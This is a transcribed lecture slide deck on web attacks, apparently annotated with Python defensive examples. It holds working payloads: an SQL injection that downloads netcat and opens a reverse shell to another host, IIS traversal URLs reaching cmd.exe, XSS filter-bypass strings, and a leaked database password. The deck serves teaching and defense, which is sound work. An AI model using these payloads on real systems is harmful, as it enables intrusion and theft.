Network Security Part II: Attacks, Web Attacks

Upload: cuthbert-charles

Post on 26-Dec-2015

Page 1: Network Security Part II: Attacks, Web Attacks

Page 2: Overview

• Web Architecture
• Web Hack Attacks

Page 3: Web Architecture

• Web applications are important, and this importance is accelerating
• Web applications are complex, and this complexity is accelerating

Page 4: This is Not New

• Problems with web applications are the same problems found in standalone applications

Page 5: Why Target the Web

• Everyone is using it
• Safe bet the protocol will not become obsolete anytime soon
• New technology is being implemented/retrofitted on top (e.g. SOAP, WebDAV)
• It's everywhere! Mobile phones, cars, watches, toasters…
• Protocol fundamentally not suited to do a majority of what it's doing today

Page 6: The Trouble with HTTP

• Multitude of involved technologies
• The involved protocols are extremely simple; therefore it is easy to (mis)code services on your own HTTP server
• Lack of experience coding public-service-type, multi-user applications
• Stateless nature makes transaction-based systems tricky

Page 7: How Did We Get Here?

• Unskilled/robotic programmers ("code mills")
• Lack of security-oriented programming training
• Tendency to 'code now, fix later'
• Current tools make it very easy to code insecurely
• Misconceptions about what 'security' really involves

Page 8: Trouble Prone Areas of the Web

• Buffer overflows
– Classic bug that's been exploited for quite a while
– Lack of bounds-checking in the language a majority of web applications are written in, combined with poor programming practice
– Can exist in the web server, application server, database server, or the CGI programs
– Fortunately it's a well-advertised problem
– Many scripting languages (ASP, PHP, Perl, .NET, etc.) are generally immune, as they have auto-expanding elements

Page 9: Trouble Prone Areas of the Web

• Cross-site scripting
– Reprinting user data without filtering it for web-specific characters
– Potential to trick users into executing JavaScript in the vulnerable site's context
– Partly a 'social engineering' technique
– More of a liability than a vulnerability: it's a way to hack the users, not the server

Page 10: Trouble Prone Areas of the Web

• SQL tampering
– Web server already has/allows access to the database server
– Attacker can cause arbitrary SQL to be executed
– Results vary from data exposure to full system compromise
– Does not require direct database access!
– Many applications are vulnerable
– Stems from CGIs/scripts making assumptions about user input and not double-checking/filtering it

Page 11: Trouble Prone Areas of the Web

• File includes
– It's common for a CGI to open and display or manipulate the contents of a file on the server
– If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file
– Can lead to information disclosure or script or command execution

Page 12: Trouble Prone Areas of the Web

• Authentication weaknesses
– CGIs can fail to check credentials with every request
– Thus you bypass the login script and directly access the following scripts, without needing a username/password
– Or, certain actions/functions may not check for the proper authentication

Page 13: Trouble Prone Areas of the Web

• Weak session mechanism
– The session/state mechanism uses predictable token IDs
– Or, the ID keyspace is too small for the number of users
– Either way, an attacker can 'guess' a valid token and hijack the session
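A worked check on the two failure modes above, added here as an example (it is not code from the deck): how many bits a token format really provides, how likely a guess is to land on a live session for a given keyspace and user population, and a generator that avoids both problems. The session counts and token formats compared are constructed.

```python
import math
import secrets


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Bits of entropy in a token drawn uniformly from alphabet_size**length values.
    A 4-digit decimal session number, for instance, offers only ~13.3 bits."""
    return length * math.log2(alphabet_size)


def hijack_probability(bits: float, active_sessions: int, guesses: int) -> float:
    """Probability that `guesses` random tokens hit any of `active_sessions` live
    sessions when tokens are uniform over a 2**bits keyspace: the slide's
    'keyspace too small for the number of users' case made concrete."""
    p_one = active_sessions / (2.0 ** bits)
    if p_one >= 1.0:
        return 1.0
    # 1 - (1 - p)**guesses, via log1p/expm1 so a tiny p does not round to zero
    return -math.expm1(guesses * math.log1p(-p_one))


def new_session_token() -> str:
    """128 bits from the OS CSPRNG: unpredictable (unlike sequential or time-based
    IDs) and a 2**128 keyspace that dwarfs any plausible number of sessions."""
    return secrets.token_urlsafe(16)   # 16 random bytes -> 22 URL-safe characters


def compare_schemes(active_sessions: int, guesses: int) -> dict:
    """Constructed comparison of three token formats under the same load."""
    return {
        "4 decimal digits": hijack_probability(keyspace_bits(10, 4), active_sessions, guesses),
        "8 hex chars": hijack_probability(keyspace_bits(16, 8), active_sessions, guesses),
        "128-bit random": hijack_probability(128, active_sessions, guesses),
    }


if __name__ == "__main__":
    for scheme, p in compare_schemes(active_sessions=1000, guesses=100).items():
        print("%-18s %.3g" % (scheme, p))
```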

Page 14: Mid Range E-Commerce Roll-Out

• Web Server
• Application Server
• Database Server
• … and a Firewall
• Maybe some options…
– Load Balancer
– Reverse Proxy servers
– Cache systems

Page 15: Typical Web Application Set-Up

[Diagram: a web client sends an HTTP request (cleartext or SSL) through the firewall to the web server (Apache, IIS, Netscape, etc.); the web applications run as server plugins (Perl, C/C++, JSP, etc.) and reach the SQL database over a database connection (ADO, ODBC, etc.); the HTTP reply carries HTML, JavaScript, VBScript, etc.]

Page 16: Traditional Hacking

• Targeted against vulnerabilities in OS components and network services
– Buffer overflows
• Not portable; attacks are specific to operating system architecture, authentication, services, etc.
• Myriad of exploits for different services, OS platforms, CPU architectures, etc.

Page 17: Traditional Hacking

• Requires specialized coding skills such as writing shell-code for buffer overflows, etc.
• In short, it is a complex activity with a limited practitioner base.

(x86 assembly fragment shown on the slide)

    ...
    winsock_found:
        xor eax, eax
        push eax
        inc eax
        push eax
        inc eax
        push eax
        call socket
        cmp eax, -1
        jnz socket_ok
        push sockerrl
        push offset sockerr
        call write_console
        jmp quit2
    socket_ok:
        mov sock, eax
        mov sin.sin_family, 2
        mov esi, offset _port
    ...

Page 18: Limitations of Traditional Hacking…

• Modern network architectures are getting more robust and secure.
• Firewalls are being used in almost all network roll-outs.
• OS vendors are learning from past mistakes (?) and coming out with patches rapidly.
• Increased maturity in coding practices.

Page 19: Utility of Firewalls

[Diagram: the firewall in front of the web server and SQL database blocks hacks on OS network services such as wu-ftpd, Sun RPC and NT ipc$; this limits traditional hacking.]

Page 20: Utility of Firewalls

[Diagram: the internal back-end application servers are on a non-routable IP network (private addresses), so they cannot be reached directly from outside.]

Page 21: Utility of Firewalls

[Diagram: outbound access from the web server is restricted. Why would a web server telnet out?]

Page 22: Futility of Firewalls

• Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls.
• HTTP is perceived as friendly traffic
• Why lay siege to the wall when you have an open door?
• Attacks based on content/applications are still viewed by some as rare.

Page 23: Tools Required for Web Hacking

• A web browser
• An Internet connection
• … a clear mind and some spare time!

Page 24: A Classification of Web Hacks

• Web attacks fall under the following general categories:
– Buffer overflow attacks
– SQL injection attacks
– Input validation attacks
– URL interpretation attacks
– Impersonation attacks

Page 25: Firewalls Cannot Prevent…

[Diagram: web client, firewall, web server; the firewall does nothing about web server misconfiguration.]

• Web server misconfiguration
– Complexity mismanagement
– Indifference

Page 26: Attack the Architecture

[Diagram of web server request handlers: the html handler returns the file with a text/html header; the shtml handler processes SSI tags (#exec, #include) via /bin/sh and included files, then returns text/html; the jsp handler processes JSP tags and passes the result through the Java compiler to a class run by the Java Runtime; the cgi handler runs scripts/executables (sh, perl, …); the default handler returns the file with a text/html header; "??" marks the undefined cases.]

Page 27: Web Server Architecture Attacks

• Complex web server architectures can lead to implementation vulnerabilities.
• A common attack is to bypass the web server configuration directives and invoke the built-in procedures directly.
• A close look at the web server architecture can reveal security problems.

Page 28: Architecture Misconfigurations

• Handler Forcing:
– Certain misconfigurations allow handlers to be forced onto files that are not supposed to be processed by them.
– Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned "as-is".
– Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine.

Page 29: JSP Handler Forcing

[Diagram: with the JSP handler forced onto html files, the file goes through JSP page compile, process JSP tags, Java compiler, class and Java Runtime instead of the html handler's plain text/html output.]

Page 30: Firewalls Cannot Prevent…

[Diagram: web client, firewall, web server and web apps; poor checking of user inputs and URL interpretation attacks pass straight through the firewall.]

• Input validation attacks

Page 31: URL Interpretation Attacks

• Several well-known vulnerabilities in Windows NT and Internet Information Services dating from autumn 2000 have been wrapped into a common definition: "The Unicode Bug."
• URL parsing vulnerability.
• Improper handling of illegal Unicode sequences.
• Allows remote users to execute arbitrary commands on the web server under the context of IUSR.
• Can lead to potential Administrator-level access.

Page 32: The IIS Unicode Bug

• Exploit: http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
– an attacker could view a directory listing of the server's C:\ drive
• %c0%af = "/"
• Can use HTTP POST to send multiple commands at a time to cmd.exe.

Page 33: Web Hacking for Collateral Damage

• Web hacking can result in three types of collateral damage:
1. Information disclosure (paths etc.)
• Arbitrary file content and source code leakage
2. Data disclosure (i.e. return all rows)
3. Arbitrary command execution

Page 34: Source Code Disclosure

"Use the Source, Luke!"

• WebLogic / WebSphere "JSP" bug [1]
• Ability to retrieve source code of JSP/JHTML files.
• Using uppercase "JSP" in the URL causes the server to return unparsed JSP code.

[1] Discovered by Shreeraj Shah, Foundstone.

Page 35: A Classic Case of "Handler Mismatch"

[Diagram: an HTTP request for index.JSP reaches the WebLogic Server; index.JSP is the same file as index.jsp, but the request is routed to the default handler (the file servlet) instead of the jsp handler (process JSP tags, Java compiler, Java Runtime), so the unparsed source is returned. Handler registrations:]

weblogic.httpd.register.file=weblogic.servlet.FileServlet

weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet

weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet

weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet

Page 36: More Source Disclosure

• URL prefixes for source code disclosure [1]:
– /servlet/file/ (IBM WebSphere)
– /file/ (BEA WebLogic)
– /*.shtml/ (BEA WebLogic)
– /ConsoleHelp/ (BEA WebLogic)
– /servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer)

[1] Advisories located on: http://www.foundstone.com/advisories.htm

Page 37: …I Thought it was Functionality

• IIS "+.htr" bug.
– View source code of ASP/ASA files.
– URL interpretation vulnerability.

http://10.0.0.1/global.asa+.htr

– ".htr" causes ISM.DLL to handle the URL.
– Characters after the "+" sign (space) are ignored.

Page 38: Doom on You….

    <SCRIPT LANGUAGE="VBScript" RUNAT="Server">
    Sub Application_OnStart
       Set Db = Server.CreateObject("Commerce.DbServer")
       Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
       Db.Application = "http://10.1.1.16/"
       Set Application("Db") = Db
    End Sub
    Sub Session_OnStart
       '==Visual InterDev Generated - DataConnection startspan==
       '--Project Data Connection
       Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
       Session("DataConn_ConnectionTimeout") = 15
       Session("DataConn_CommandTimeout") = 30
       Session("DataConn_RuntimeUserName") = ""
       Session("DataConn_RuntimePassword") = ""
       '==Visual InterDev Generated - DataConnection endspan==
    End Sub
    </SCRIPT>

User ID: sa

Password: n0t4u2c

Page 39: More Source Disclosure

• Some applications access files without appropriate checking.
• Input validation vulnerability.
• No checking performed for file type or location.
• Filenames can be manipulated via parameters passed on the URL or as hidden fields.

Page 40: NT IIS Showcode ASP Vulnerability

• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0
• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.

http://www.someserver.com/msadc/Samples/SELECTOR/Showcode.asp?source=/msadc/Samples/../../../../../boot.ini

Page 41: Firewalls Cannot Prevent…

[Diagram: input validation attacks and URL interpretation attacks pass the firewall and reach the web apps; from there, extended SQL statements reach the SQL database.]

• SQL Query Poisoning

Page 42: SQL Query Poisoning

• Poor input validation on parameters passed to SQL queries can be disastrous.
• Return all rows: http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query: SELECT * FROM PRODUCT WHERE ID=3 OR 1=1

Page 43: SQL Query Poisoning

• Drop Table: http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
• Resultant query: SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT

Page 44: SQL Query Poisoning

• Remote Command Execution! http://10.0.0.3/showtable.asp?ID=3%01EXEC+master..xp_cmdshell+'tftp+-i+10.0.0.13+GET+nc.exe+%26%26+nc+-e+cmd.exe+10.0.0.11+2000'
• Command executed: tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000

Page 45: SQL Remote Commando

[Diagram: (1) the web browser sends the poisoned request to the IIS/ASP server, which passes the query to the DB; (2) a tftp server gets nc.exe transferred over to the NT IIS box; (3) a listener at port 2001 receives the connection (C:\>_).]

SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000
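The showtable.asp query of pages 42 to 44, rebuilt so the two versions can be run side by side: the string-concatenated statement from the slides, and a default-deny, parameterized one. This is an added example, not the deck's code; the PRODUCT table, its rows and the function names are constructed, and SQLite stands in for the SQL Server behind showtable.asp.

```python
import re
import sqlite3

# Constructed rows standing in for the deck's PRODUCT table.
PRODUCTS = [(1, "widget", 9.99), (2, "gadget", 19.99),
            (3, "gizmo", 29.99), (4, "doohickey", 4.50)]
ID_PATTERN = re.compile(r"[0-9]{1,9}")   # the only shape an ID may take


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PRODUCT (ID INTEGER PRIMARY KEY, NAME TEXT, PRICE REAL)")
    conn.executemany("INSERT INTO PRODUCT VALUES (?, ?, ?)", PRODUCTS)
    return conn


def vulnerable_sql(id_param: str) -> str:
    """What showtable.asp does: the raw ID parameter is pasted into the SQL text,
    so the decoded query string '3 OR 1=1' rewrites the WHERE clause itself."""
    return "SELECT * FROM PRODUCT WHERE ID=" + id_param


def showtable_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    return conn.execute(vulnerable_sql(id_param)).fetchall()


def showtable_hardened(conn: sqlite3.Connection, id_param: str) -> list:
    """Default-deny the parameter (digits only, bounded length), then bind it with
    a placeholder so the value can never change the statement's structure."""
    if not ID_PATTERN.fullmatch(id_param):
        raise ValueError("ID rejected: %r" % (id_param,))
    return conn.execute("SELECT * FROM PRODUCT WHERE ID=?", (int(id_param),)).fetchall()


def demo() -> tuple:
    """Run both versions against the slide's poisoned parameter and a normal one.
    Returns (rows leaked by the vulnerable version, whether the hardened version
    refused the poisoned value, rows the hardened version returns for ID=3)."""
    conn = make_db()
    poisoned = "3 OR 1=1"                             # ID=3+OR+1=1 after URL decoding
    leaked = showtable_vulnerable(conn, poisoned)     # every row comes back
    try:
        showtable_hardened(conn, poisoned)
        blocked = False
    except ValueError:
        blocked = True
    return len(leaked), blocked, showtable_hardened(conn, "3")


if __name__ == "__main__":
    print(demo())   # (4, True, [(3, 'gizmo', 29.99)])
```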

Page 46: Firewalls Cannot Prevent…

[Diagram: besides input validation attacks, SQL query poisoning and URL interpretation attacks, the firewall cannot prevent reverse engineering of HTTP cookies or HTTP session hijacking.]

• Impersonation

Page 47: Firewalls Cannot Prevent…

[Diagram: the same set-up as page 15: web client, HTTP request (cleartext or SSL), firewall, web server (Apache, IIS, Netscape, etc.), web app plugins (Perl, C/C++, JSP, etc.), database connection (ADO, ODBC, etc.), SQL database, and the HTTP reply (HTML, JavaScript, VBScript, etc.).]

• Application bugs

Page 48: The MDAC Attack

• Vulnerability with Microsoft Data Access Components (msadcs.dll).
• MDAC allows remote users to perform SQL queries without authentication.
• Only the DSN needs to be known.
• SQL queries can be crafted to execute arbitrary commands.

Page 49: The MDAC Attack

[Diagram of the Remote Data Service architecture: on the client, Internet Explorer or VB.exe uses the RDS Data Control and RDS Data Space and talks over HTTP (URL/HTML) to the IIS server; on the server, msadcs.dll exposes the RDS Data Factory, custom business objects and ASP (ADO), which reach OLE DB, the ODBC provider and the Jet 3.5 provider.]

Page 50: The MDAC Attack

• Exploit:

    $query = "Select * from Customers where City='|shell(\"$command\")|'";
    $dsn = "driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";

• Gain Administrator privileges on NT!

Page 51: The MDAC Attack in Action

[Diagram: (1) mdac.pl (exploit) sends the query to msadcs.dll on IIS 4.0 and the DB; (2) a tftp server gets nc.exe transferred over to the NT IIS box; (3) a listener at port 2001 receives the connection (C:\>_).]

SELECT * FROM Customers WHERE City = "|shell($command)

Page 52: The Effectiveness of Web Hacking

• By default, ports 80 and 443 are usually allowed through firewalls. The open door…
• A single URL string is able to be processed by many different components.
• In most cases the only defense is reliance on secure coding.

Page 53: Missile of Death

[Diagram: a single request, http://10.0.0.1/catalog/display.asp?pg=1&product=7, passes through the web server, the web apps and on to the databases.]

Page 54: Cross Site Scripting, Why You Should Care

• XSS is not an attack on the server, it is an attack on the users of your application
• So what?
– Identity theft
– User masquerading
– Reputation risk

Page 55: Cross Site Scripting (XSS)

• Found in 98% of applications
• 2 main types
– Transient (URL based): http://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>
– Sticky: script placed in a static bit of web content

Page 56: XSS continued…

• Transient generally requires user interaction
• What can happen?
– Possibilities are only restricted by the client
– Cookie theft is the most common example
• But I filter "<" and ">"
– JScript entities: "&{alert('Test')};"

Page 57: Session Hijacking

• HTTP is stateless, so application designers must build a way to track state
• Cookies and URL strings are the most common ways to track state
• Both are easily exploitable

Page 58: Session Hijacking Continued…

• Generally the next thing to occur after XSS
• Examples of common session tracking issues

Page 59: Parameter Tampering

• Programmers will store data anywhere!
– URL parameters: http://badapp.com/checkout.pl?p=$1.00
– Cookies: Cookie: p=$1.00
– Hidden fields: not really hidden

Page 60: Unbound File Calls

• Ye Ole' ../../
• Becomes an issue with the display of important information (global.asa)
• Most application languages will take URLs as file arguments

Page 61: Do You Know Where Your Data is?

• Building an exclusionary filter is difficult because your data is all over the place

Page 62: Data Flow Example

[Diagram: data entering www.hackme.com from the Internet flows on into the customer service database, the marketing database and the orders database.]

Page 63: Designing a proper filter

• Make all filters default deny
– Don't try to exclude "bad stuff"
• Requires a good idea of where your data is going
• Log all filter violations
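The three rules above turned into code, added here as an example (not from the deck): a per-parameter allow-list where anything unlisted or non-matching is rejected and logged, and a checkout that takes the price from the server's catalogue so the p=$1.00 tampering of page 59 has nothing to tamper with. The parameter rules, the catalogue and the function names are constructed.

```python
import logging
import re

log = logging.getLogger("webfilter")

# Allow-list keyed by parameter name: a value is accepted only if its name is
# listed and the whole value matches the pattern. Everything else is a violation.
PARAM_RULES = {
    "pg": re.compile(r"[0-9]{1,3}"),
    "product": re.compile(r"[0-9]{1,6}"),
    "ID": re.compile(r"[0-9]{1,6}"),
    "msg": re.compile(r"[A-Za-z0-9 .,!?-]{0,80}"),
}

# Constructed catalogue: the only source of prices the server trusts.
CATALOGUE = {3: 29.99, 7: 19.99}


def filter_params(params: dict, client: str = "-") -> tuple:
    """Return (accepted, violations). Every rejected parameter is logged, since a
    filter violation is usually the earliest sign that the application is being probed."""
    accepted, violations = {}, []
    for name, value in params.items():
        rule = PARAM_RULES.get(name)
        if rule is None:
            reason = "unknown parameter %r" % (name,)
        elif not rule.fullmatch(value):
            reason = "parameter %r failed allow-list: %r" % (name, value)
        else:
            accepted[name] = value
            continue
        violations.append(reason)
        log.warning("client=%s %s", client, reason)
    return accepted, violations


def checkout_total(params: dict, client: str = "-") -> float:
    """The price is looked up server-side by product id; a client-supplied price,
    whether in the URL, a cookie or a hidden field, is just a logged violation."""
    accepted, _ = filter_params(params, client)
    if "product" not in accepted:
        raise ValueError("no valid product parameter")
    product_id = int(accepted["product"])
    if product_id not in CATALOGUE:
        log.warning("client=%s unknown product %d", client, product_id)
        raise ValueError("unknown product")
    return CATALOGUE[product_id]


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    print(checkout_total({"product": "7", "p": "$1.00"}, client="10.0.0.13"))
```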

Page 64: Filter Bypassing is a Technique to Evade Detection by Filtering Systems

• Filter bypassing techniques come in many varieties when applied to the many facets of web application security.
• The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.
• Many of the described techniques can be highly effective when used properly and become even more powerful when used in combination.

Page 65: Most filter systems are very simple

Seven forms of ingenuity:
• URL Encoded Strings
• Double Hex Encoding
• Unicode Encoded String
• Long URLs
• Case Sensitivity
• XSS Filter-Bypass Manipulation
• Null Character Injection

Page 66: The Hex Advantage

By URL hex encoding URL strings, it may be possible to circumvent filter security systems and IDS.

http://foo.com/cgi?file=/etc/passwd

Can become:

http://foo.com/cgi?file=/%2F%65%74%63%2F%70%61%73%73%77%64

Page 67: Double Hex Encoding

• In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.
• The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.
• An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.
• When an unpatched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.
• IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.
• This secondary decoding was the source of another vulnerability.

Page 68: IIS Double Hex

Round 1 decoding: scripts/..%255c../winnt becomes scripts/..%5c../winnt (%25 = "%" character)

Round 2 decoding: scripts/..%5c../winnt becomes scripts/..\../winnt

Directory path traversal is now possible using path obfuscation through double hex encoding.

Page 69: The Unicode Slash

• In Unicode, "%c0%af" is the equivalent of a slash ("/").
• Therefore the common IIS URL exploit: scripts/..%c0%af../winnt
• becomes: scripts/../../winnt

Once again, directory path traversal is possible using path obfuscation through Unicode.

Page 70: Double Slash

• Double Slash: using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd
• Can be used to move under the radar of IDS systems and still function properly.

Page 71: Long URLs

• Many systems put limits on how much data a variable can store or a system can handle.
• Often, if these limits are exceeded, the data will still be used but bypass certain security considerations.
• URLs such as: http://www.foo.com/cgi?param=filename
• Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>

Page 72: Case Sensitivity

• Case sensitivity may play a role in many security filtration systems.
• Alternating case on URL parameters may be used to bypass certain restrictions.

http://foo.com/cgi?param=bar
http://foo.com/cgi?param=BaR
http://foo.com/CGI?param=BAR

Page 73: Method Switching

• Many web applications do not properly perform HTTP request method sanity checking.
• Method switching can be used to bypass IDS, logging features and CGI security mechanisms.
• Most web servers do not log "POST" data, and thus forensic analysis is harder to perform.

The request method: GET /cgi-bin/some.cgi

can become: POST /cgi-bin/some.cgi

Page 74: HTTP 1.1 Methods

The Method token indicates the method to be performed on the resource identified by the Request-URI.

• OPTIONS
• GET
• HEAD
• POST
• PUT
• DELETE
• TRACE
• CONNECT

Page 75: Using your "HEAD"

• The "HEAD" request method can be used to determine whether a particular HTTP resource is accessible without actually downloading the resource data.
• Scans and web application attacks can be made more effective using this technique.

Page 76: Null Character Injection

• Hex-encoded null characters can be used to thwart some security mechanisms.
• This happens because in the "C" programming language, a null character designates the end of a string.
• So if a CGI appends ".html" to an input parameter: http://foo.com/cgi?file=../../etc/passwd%00
• the null will cut off the appended ".html".
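The fix for the whole family of path tricks on pages 66 to 70 and 76 is the same: decode completely first, then check. Below is an added example (not the deck's code) of a file-parameter resolver that does exactly that: it percent-decodes to a fixed point (so %255c and %5c end up identical, unlike the IIS check-then-decode order), rejects a NUL before any suffix is appended, rejects overlong UTF-8 such as %c0%af by decoding strictly, treats backslashes as separators, collapses doubled slashes, and only then tests that the normalized path is still under the document root. DOC_ROOT, the ".html" suffix and the function names are assumptions.

```python
import posixpath
from urllib.parse import unquote_to_bytes

DOC_ROOT = "/var/www/htdocs"   # assumed document root for this example
MAX_DECODE_ROUNDS = 3          # bounded, so stacked "%2525..." layers cannot loop forever


def fully_decode(raw: str) -> bytes:
    """Percent-decode until the value stops changing. IIS checked after one round and
    decoded again afterwards; here nothing is checked until decoding has reached a
    fixed point, so "%255c" and "%5c" both arrive as the same backslash byte."""
    data = raw.encode("utf-8")
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            return decoded
        data = decoded
    raise ValueError("too many encoding layers")


def resolve(raw_file_param: str, suffix: str = ".html") -> str:
    """Map a ?file= parameter to an on-disk path under DOC_ROOT, or raise ValueError."""
    decoded = fully_decode(raw_file_param)
    if b"\x00" in decoded:
        # In C the NUL would terminate the string and silently drop the suffix.
        raise ValueError("NUL byte in path")
    try:
        # Strict UTF-8 rejects overlong forms such as %c0%af (the "Unicode slash").
        text = decoded.decode("utf-8")
    except UnicodeDecodeError:
        raise ValueError("invalid UTF-8 sequence") from None
    text = text.replace("\\", "/")            # IIS treats backslash as a separator too
    if text.startswith("/"):
        raise ValueError("absolute path not allowed")
    if not text.endswith(suffix):
        text += suffix
    # normpath collapses "//" and resolves "." and ".." before the root check.
    full = posixpath.normpath(posixpath.join(DOC_ROOT, text))
    if not full.startswith(DOC_ROOT + "/"):
        raise ValueError("path escapes document root")
    return full


def check(raw_file_param: str) -> tuple:
    """(True, path) when the request is allowed, (False, reason) otherwise."""
    try:
        return True, resolve(raw_file_param)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for sample in ("docs/intro", "scripts/..%255c../winnt", "scripts/..%c0%af../winnt",
                   "../../etc/passwd%00", "/%2F%65%74%63%2F%70%61%73%73%77%64",
                   "..//etc//passwd"):
        print("%-40s %s" % (sample, check(sample)))
```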

Page 77: Unicode (UTF-8) Encoded

• Unicode is a universal way to represent characters.
• However, Unicode can also be used to circumvent security mechanisms by representing information in another fashion.
• Microsoft IIS has had security issues in the past while supporting Unicode.

Page 78: URL Encoded String

• The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the allowed characters in URLs to only a limited subset of the US-ASCII character set:
• "...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."

Page 79: XSS Filter-Bypass Manipulation

• This technique is used to pass various types of client-side scripting language through implemented security filters.
• The idea is to be able to achieve client-side execution of a client-side script.
• There are several techniques used to perform this attack.

Page 80: Hammer the Filters

• Submit all the raw HTML tags you can find, and then view the output results.
• Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript event handlers).
• This will show what HTML is allowed, what the changes were, and possibly dangerous HTML that can be exploited.

Page 81: SRCing the Protocol

• Using the "javascript" protocol in an HTML source attribute.

<IMG SRC="javascript:js_expression">

<IMG SRC="javascript:alert('test');">

Page 82: Alternate Protocol SRCing

• Same technique as the previous; however, using the protocols "livescript" and "mocha" will yield the same effect.

<IMG SRC="livescript:js_expression">

<IMG SRC="mocha:alert('test');">

Page 83: Decimal HTML Entities

• Variation on the previous techniques: using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.

<IMG SRC="java&#010;script:js_expression">

• \09 \10 \11 \12 \13 have all been seen to work

Page 84:

Hex HTML Entities

• Another variation: a hexadecimal HTML entity also bypasses the filter restriction, yet the JavaScript still executes.

<IMG SRC="java&#X0A;script:js_expression">

Page 85:

Padding HTML Entities

• Padding the entity with leading zeros may also bypass a filter that only recognizes the short forms (&#10; or &#x0A;), yet the browser still executes the JavaScript.

<IMG SRC="java&#000009;script:js_expression">

Page 86:

STYLE JavaScript Type

• Changing the MIME type on a "style" tag may be used to execute JavaScript (Netscape 4's JavaScript Style Sheets; other browsers ignore the block).

<style TYPE="text/javascript">JS EXPRESSION</style>

<style TYPE="text/javascript">alert(document.domain);</style>

Page 87:

STYLE JavaScript X-Type

• Variation on the previous example: with the "application/x-javascript" MIME type, a filter that only knows "text/javascript" may be bypassed.

<STYLE TYPE="application/x-javascript">

alert('JavaScript has been Executed');

</STYLE>

Page 88:

STYLE JavaScript Import

• The @import feature in CSS may be used to perform JavaScript protocol SRCing from inside a style sheet.

<style TYPE="text/css">

@import url(javascript:alert('Javascript is executed'));

</style>

Page 89:

STYLE URL Import

• The @import feature in CSS can also pull a style sheet from another HTTP resource; that remote sheet is under the attacker's control and can carry any of the script-in-CSS tricks on these slides.

<STYLE type=text/css>

@import url(http://www.test.com);

</STYLE>

Page 90:

LINK Style Sheet

• The "LINK" tag can be used to load JavaScript from a remote HTTP resource. LINK names its target with HREF (it has no SRC attribute), so the payload must use HREF:

<LINK REL=STYLESHEET TYPE="text/javascript" HREF="javascript_path.js">

Page 91:

Style Left Expression

• A few CSS features used together to execute JavaScript: Internet Explorer's expression() "dynamic property" (IE-only, removed in IE8 standards mode) evaluates its argument as script whenever the style is recomputed.

<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))">

Page 92:

Remote SRCing

• A few HTML tags, such as "LAYER", "ILAYER", "FRAME" and "IFRAME", can be used to SRC in JavaScript from remote resources (LAYER and ILAYER are Netscape 4 only; IFRAME works everywhere).

<LAYER SRC="js.html"></LAYER>

<IFRAME SRC="js.html"></IFRAME>

Page 93:

...AND CURLY

• Netscape's "JavaScript entity" syntax evaluates the expression inside &{ ... } wherever an attribute value is expected; there is no scheme at all for a filter to match.

<IMG SRC="&{javascript_expression};">

<IMG SRC="&{alert('alert')};">

• Syntax must be exact.

Page 94:

Dangerous HTML Tags

• "All HTML is to be considered dangerous, but these tags are the most insidious."

– <APPLET>
– <BODY>
– <EMBED>
– <FRAME>
– <FRAMESET>
– <HTML>
– <IFRAME>
– <IMG>
– <LAYER>
– <ILAYER>
– <META>
– <OBJECT>
– <SCRIPT>
– <STYLE>

Page 95:

Dangerous HTML Attributes

• (HTML tags with these attributes; each one carries a URL or a style that can smuggle in script.)

– SRC
– LOWSRC
– STYLE
– HREF
